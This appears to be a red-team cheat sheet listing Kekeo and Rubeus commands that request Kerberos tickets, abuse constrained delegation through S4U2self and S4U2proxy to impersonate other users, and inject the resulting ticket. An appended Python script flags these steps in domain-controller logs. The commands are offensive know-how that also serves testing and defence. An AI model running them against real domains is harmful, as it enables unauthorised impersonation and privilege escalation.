kekeo/rubeus

Resources

  1. Rubeus

  2. Kekeo

  3. Service for User (S4U)

  4. S4U2self and S4U2proxy

For each of the following sections, I aim to provide the equivalent commands in Kekeo and Rubeus (some of the sections may only have examples in one tool).

1. Request for Ticket Granting Ticket (TGT)

kekeo # tgt::ask /user:<user> /domain:<domain> /password:<password>
C:\> rubeus.exe asktgt /user:<user> /password:<password>
  • For rubeus, if /password is used instead of a hash, the exchange defaults to RC4; /enctype:X overrides this, with des|aes128|aes256 as options

2. Request for Ticket Granting Service (TGS)

C:\> rubeus.exe asktgs /ticket:<ticket> /service:<servicename>

3. Constrained delegation abuse: Service for User (S4U)

kekeo # tgs::s4u /tgt:<path_to_TGT> /user:<username> /service:<servicename>

The kekeo command listed above essentially performs the S4U2self and S4U2proxy steps that can be achieved with rubeus (see below).

From the Rubeus S4U documentation page link above, we can find a few examples:

a. S4U2self

C:\> rubeus.exe s4u /user:<username> /rc4:<rc4_hash> /impersonateuser:<user_to_impersonate>
  • /rc4: rc4 hash of the user associated with /user

    • The TGT for an account with a msds-allowedtodelegateto permission can be used instead (/ticket:X)

  • /impersonateuser : required parameter specifying the user on whose behalf we plan to obtain a service ticket

From this command, we will obtain the following:

  1. A TGT for the user specified in /user

  2. A TGS for the user specified in /impersonateuser

  • Using the S4U2self extension: the service account can use the TGS obtained to authenticate to itself (or more specifically, to the service it runs) on behalf of the user specified in /impersonateuser

b. S4U2proxy

C:\> rubeus.exe s4u /ticket:<TGT> /msdsspn:<SPN> /tgs:<TGS>
  • /ticket : TGT obtained from the previous step

  • /msdsspn : Service Principal Name (SPN)

    • This value must be listed under the msds-allowedtodelegateto property for the service account (supplied to the /user field in the previous step)

  • /tgs : The forwardable ticket retrieved from the previous step (S4U2self ticket for the user specified in /impersonateuser)

From this command, we obtain a TGS for the impersonated user (specified in /impersonateuser) to the service defined in /msdsspn.

Next, we can use the TGS we have obtained to authenticate to the service (defined in /msdsspn) as our desired user:

C:\> rubeus.exe ptt /ticket:<TGS>

or by supplying the /ptt flag to the s4u command.

c. Combining all steps: TGT request, S4U2self process, S4U2proxy execution and pass-the-ticket (injection of the final ticket)

C:\> rubeus.exe s4u /user:<username> /rc4:<rc4_hash> /impersonateuser:<user_to_impersonate> /msdsspn:<SPN> /ptt
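As an added, defender-side example (not part of these notes or of either tool), the following Python flags the traces the combined chain above leaves in domain-controller security logs: an RC4 (0x17) TGT request (the asktgt /password or s4u /rc4 default) in event 4768, and an S4U2proxy service ticket in event 4769, whose Transited Services field names the first-hop service. The key=value event lines are constructed for this example, and the field semantics are assumptions taken from Microsoft's 4768/4769 documentation.

```python
from collections import defaultdict

# Constructed sample events, abridged into key=value form (not real exports).
# Assumed field semantics (Microsoft 4768/4769 documentation):
#   4768 = TGT request; TicketEncryptionType 0x17 is RC4-HMAC, 0x12 is AES256.
#   4769 = service ticket request; TransitedServices is "-" for a plain request
#   and lists the first-hop service when the ticket came from S4U2proxy.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.5",
    "EventID=4768 TargetUserName=alice TicketEncryptionType=0x12 IpAddress=10.0.0.7",
    "EventID=4769 TargetUserName=administrator ServiceName=svc_web TransitedServices=- IpAddress=10.0.0.5",
    "EventID=4769 TargetUserName=administrator ServiceName=cifs/fileserver TransitedServices=svc_web@CORP.LOCAL IpAddress=10.0.0.5",
    "EventID=4769 TargetUserName=alice ServiceName=cifs/fileserver TransitedServices=- IpAddress=10.0.0.7",
]


def parse_event(line):
    """Split one constructed key=value event line into a dict."""
    return dict(field.split("=", 1) for field in line.split())


def analyze(lines):
    """Return (rule, subject, detail) findings for suspicious Kerberos activity."""
    findings = []
    rc4_tgt_hosts = defaultdict(set)  # IpAddress -> accounts that obtained an RC4 TGT
    for ev in map(parse_event, lines):
        eid, ip = ev.get("EventID"), ev.get("IpAddress", "?")
        if eid == "4768" and ev.get("TicketEncryptionType") == "0x17":
            # RC4 TGT in an AES-capable domain: matches the /password and /rc4 defaults
            rc4_tgt_hosts[ip].add(ev["TargetUserName"])
            findings.append(("rc4_tgt", ev["TargetUserName"], ip))
        elif eid == "4769" and ev.get("TransitedServices", "-") != "-":
            # Delegated ticket: S4U2proxy produced a TGS for TargetUserName to ServiceName
            findings.append(("s4u2proxy", ev["TargetUserName"], ev["ServiceName"]))
            if ip in rc4_tgt_hosts:
                # Same host earlier requested an RC4 TGT: the full s4u /rc4 ... /msdsspn chain
                findings.append(("rc4_tgt_then_s4u2proxy", ip,
                                 ",".join(sorted(rc4_tgt_hosts[ip]))))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The S4U2self request itself (third sample line) is indistinguishable here from an ordinary service ticket request, so correlation with the preceding RC4 TGT and the following delegated ticket is what makes the chain visible.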
